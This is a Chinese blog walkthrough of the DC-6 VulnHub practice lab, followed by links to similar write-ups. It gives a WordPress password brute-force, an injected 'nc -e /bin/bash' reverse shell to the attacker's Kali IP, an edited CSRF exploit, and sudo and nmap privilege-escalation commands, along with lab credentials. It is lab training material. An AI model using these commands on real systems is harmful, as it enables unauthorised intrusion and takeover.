DC-6靶机详细渗透过程

最新推荐文章于 2024-08-07 08:45:00 发布
最新推荐文章于 2024-08-07 08:45:00 发布
阅读量826 收藏 2
点赞数 3
分类专栏: 教程 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrs_jianai/article/details/128402204
版权

1.靶机部署

kali安装:https://blog.csdn.net/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载:https://www.five86.com/downloads/DC-6.zip
解压后得到一个.ova的文件:
image.png
使用VMware打开该文件:
image.png
设置好名称和虚拟机位置:
注意:导入过程中可能会提示导入失败,点击重试即可。
image.png
导入成功,打开虚拟机,到此虚拟机部署完成!
image.png
注意:靶机的网络连接模式必须和kali一直,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机。

2.信息收集

2.1 IP扫描

使用nmap扫描同一个段下存活的IP,发现148开启了80端口

nmap 192.168.11.0/24

image.png
那么这个应该就是我们的靶机,在浏览器访问一下:
image.png
发现无法访问,并且地址栏出现了网站的域名,猜测应该是网站做了重定向,那我们在host文件里面添加一下IP和域名:

host文件位置:C:\Windows\System32\drivers\etc
192.168.11.148 wordy

image.png
image.png
再次访问就可以访问网站了:
image.png
kali的host文件在etc文件夹:
image.png
跟Windows一样,添加IP和域名
image.png

2.2 其他信息收集

扫描靶机开放的端口:

nmap -A -T4 -p- 192.168.11.148

image.png
使用插件查看网站CMS:

插件名称:Wappalyzer

image.png
敏感目录扫描:

dirb http://192.168.11.148

image.png

3.渗透过程

我们刚刚通过扫描敏感目录,发现了一个状态码为200,意思是可达的地址,访问发现是一个登录页面:

http://192.168.11.148/wp-admin/

image.png

扫描用户名

并且我们知道网站的CMS是word press,那我们就可以尝试使用wpscan扫描一下用户名:

wpscan --url wordy -e u

image.png
得到五个用户名,保存下来:
image.png

得到密码字典

当我们像DC-2一样扫描密码时,发现不可以:
image.png
这时候我们想起了作者的提示:
image.png
使用作者的提示生成一个密码字典:

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

image.png
有了用户名字典和密码字典,我们来爆破一下:

用户名:mark
密码:helpdesk01

image.png
登录:
image.png

漏洞发现

大概浏览页面之后,发现有个插件:
image.png
回想起刚开始看见页面的时候:
image.png
不知道什么意思?那停下来好好想想吧!!!

反弹shell-1

使用kali查找一下插件Activity monitor的漏洞:

searchsploit Activity monitor

image.png
发现了两个关于word press的漏洞,我们一个一个进行尝试,先尝试45274.html,将脚本下载下来,并查看其内容:

searchsploit -m 45274.html

image.png
查看内容,漏洞形式为PoC,并且存在CSRF(跨站请求伪造)漏洞 ,大概知道该脚本可以反弹shell。
没看出来???那可能是你打的靶场少,现在你就记住了!

cat 45274.html

image.png
修改内容,第一段为网站的域名,第二段为nc反弹shell的代码,其中IP地址为kali的IP
image.png
kali端打开nc监听:
image.png
文件修改好之后,在浏览器中访问此文件:
image.png
然后你就可以发现反弹shell成功了!!!
image.png

反弹shell-2

除上面的方法之外,还有其他可以反弹shenll的方式:
可以看到这里要求我们输入一个IP地址,那是否可以执行其他命令呢?
image.png
拼接ls命令试一下,发现可以执行,那我们是否可以考虑执行反弹shell命令:
image.png
拼接反弹shell命令:
记得卡里先开启监听
image.png
输入命令:

127.0.0.1 | nc -e /bin/bash 192.168.11.128 4444

注意:这里输入框的大小可能不够,需要打开开发者模式从源码修改文本框的大小,如果看不懂html代码,建议回炉重造!!!!
image.png
反弹成功!!!
image.png
生成交互式shell:

python -c “import pty;pty.spawn(‘/bin/bash’)”

image.png

发现用户名和密码

大概浏览文件:
在/home/mark/stuff目录下发现things-to-do.txt文件,其中有一名用户和密码:

用户名:graham
密码:GSo7isUM1D4

image.png
直接使用ssh连接:

ssh graham@192.168.11.148

image.png

提权

查看有限权限:

sudo -l

image.png
发现graham可以用jens的身份执行 /home/jens/backups.sh,那么如果把 /bin/bash追加到这个文件,然后用jens的身份执行这个文件的时候就会打开一个具有jens权限的shell

cd /home/jens
echo ‘/bin/bash’ >> backups.sh
sudo -u jens ./backups.sh

image.png
切换到jens用户后查看权限,发现jens可以使用root权限的nmap:
image.png
nmap在早期版本是可以用来提权的,我们来尝试一下nmap提权。将提权代码 os.execute(“/bin/sh”)写入一个文件中:

echo “os.execute(‘/bin/bash’)” > getshell

然后以root的权限用nmap执行这个脚本:

sudo nmap --script=getshell

image.png
注意:这里好像有个bug,提权后输入的命令不显示,只管输入直接回车就好了!!!

夺旗!

image.png

小秋LY
关注
专栏目录
靶机实战-DC-6
滕财然的博客
03-03 818
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
靶机DC-8(详细渗透,适合新手渗透
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC-6靶机渗透
m0_62008601的博客
05-31 576
攻击机kali:192.168.56.102 靶机dc-6:192.168.56.107 为确保两台服务器在同一网段下,我这里dc-6的网络设置为仅主机网络,kali的设置为桥接模式,这样才能通过kali扫描出dc-6靶机的ip。 配置好环境之后就可以开始操作了 扫描存活的主机 扫描靶机开放的端口 看到开放了80端口和22端口,浏览器进行访问 无法访问,这个问题和前面的一个靶机类似,存在域名解析错误,知道了域名为wordy,就可以去hosts文件(在/etc/hosts).
DC系列靶场---DC 6靶场渗透测试
最新发布
zhouA0221的博客
08-07 974
使用graham用户查看sudo的使用权限,看到jens用户可以不用输入密码执行backups.sh脚本。Mark家目录下有个文本文件,内容就是有个用户graham账户文件中是有这个用户的,后面的很可能就是这个用户的密码。6、在从graham用户切换到jens用户时查看sudo权限的时候要注意脚本文件,脚本是直接可以进行提权的。这里我们使用插件看到这是WordPress的CMS,wpscan准门针对WordPress开发的。5、信息收集的时候一定要注意用户家目录的文本文件,这里面很容易出现密码。
DC6-靶机渗透
banacyo14206的博客
08-22 556
靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( ...
DC6-靶机
Au
10-30 1686
下载地址 下面是作者的提示,和爆破的字典有关 cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 配置的环境: kali:192.168.25.131 DC6-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/...
靶机DC-6
weixin_43940853的博客
11-27 1213
靶机 :192.168.230.231 kali : 192.168.230.226 一开始扫描到80和22 访问80,发现是wordpress,用wpscan扫出用户,根据作者的提示,得到密码字典,爆破 记一下这个linux命令 爆破出用户是mark,密码是helpdesk01,wordpress登录 其他wp上讲的是用msf会搜到一个关于activity monitor的ssrf漏洞,但...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
DC-9 靶机渗透
Rex_Surprise的博客
05-10 370
DC-9 靶机渗透 1. 渗透过程 THE_END! DC-9 靶机渗透1. 渗透过程 初期脚本扫描 扫描结果 可以发现 ip地址为:192.168.0.114 ssh (但是ssh无法访问了) 和 http服务s 但是没有其他可用的信息 爆破一下目录 我这里用御剑爆破 输入url: http://192.168.0.114...
DC-1靶机渗透详细过程(附靶机连接)
bwt_D的博客
05-19 792
查看本机的ip地址 使用nmap进行ip地址扫描,确定靶机的IP nmap -sP 192.168.159.1/24 对其进行详细扫描 nmap -A 192.168.159.140 -p 1-65535 80端口开放,直接使用浏览器访问 使用MSF搜索该网页模板存在的漏洞 msfconsole search drupal 使用第四个攻击模块 use exploit/unix/webapp/drupal_drupalgeddon2 选择攻击载荷 set payload php/meterpreter
渗透测试:DC-6靶机
Ciyaso的博客
08-21 300
一、扫描获取靶机ip arp-scan -l 192.168.203.145 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.145 开放了22、80端口 访问主页,发现访问不了,和DC-2一样存在重定向,需要修改hosts文件 成功访问 2.Wappaloyzer CMS:WordPress 操作系统:Debian 数据库:Mysql Web服务器:Apache 2.4.25 3.wpscan 由于使用的是WordPress,所以我们使用wpsacn进行扫描
渗透项目】靶机DC-6渗透过程
命运的旋律的博客
05-05 759
信息收集 主机发现 nmap -sn 192.168.189.0/24 端口扫描 nmap -sT -v -A 192.168.72.158 --script=vuln 发现开放了80端口,尝试用浏览器对该站点进行访问 该网站应该做了访问限制,只能通过域名的方式访问,但因为本地hosts中缺少对应的IP,导致域名解析失败而无法进行访问,解决办法是在hosts文件中写入对应域名和IP...
dc-6 靶机渗透学习
..
03-21 1747
信息收集 扫描当前网段,确定存活主机 nmap -sP 192.168.202.0/24 对靶机进行端口扫描,发现80、22端口开放 nmap -A -p- -v 192.168.202.145 访问80端口,发现和dc-2一样的问题,会自动跳转到域名,需要手动在hosts文件加入ip对应关系。 修改后重新访问80端口,用Wappalyzer扫描一下框架,发现是WordPress 根据靶机作者的提示,大致就知道是通过爆破来做 用专门的CM...
DC-6靶机
mlws1900的博客
03-26 1667
开放了一个http和ssh服务,用浏览器打开http服务,发现无法访问,和之前一样,去修改dns文件。登录地址(wordpress的后台地址,信息搜集,目录扫描,都做到这里了,不再做演示)发现可操作/home/jens/backups.sh,打开发现是一个解压的脚本。命令注入,打开bp进行抓包,在ip那一栏填上一个网址,点击lookup。不知道为什么,我这个shell不会显示我自己打的命令,所以需要自己盲打。设置网络为nat模式,启动打开时,发现错误直接重试和点是。看了大佬的wp,发现提示写在人家官网。
DC系列(6)DC-6靶机渗透
Nikris的博客
01-12 3748
DC6
渗透测试学习之靶机DC-6
xdbzdgx的博客
11-28 5820
1.下载靶机 本篇文章是DC靶机系列的第6篇,针对的是靶机DC-6,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-6的下载地址为DC: 6 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 DC-6只有一个flag。 在VMware加载成功之后并开启,建议把DC-6靶机的网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.88
vulnhub之DC6靶机
LainWith的博客
02-14 555
目录介绍信息收集主机发现主机信息探测访问网站wpscan测试站点登录站点反弹shell信息收集提权 介绍 系列: DC(此系列共10台) 发布日期:2019 年 4 月 26 日 难度:初级-中级 Flag:获取root权限,并拿到唯一的flag 学习: ● wordpress 安全测试 ● 本地代码执行 ● nmap 提权 靶机地址:https://www.vulnhub.com/entry/dc-6,315/ 提示信息: 靶机支持Virtualbox和Vmware 需要修改hosts文件,如:192.
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小秋LY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值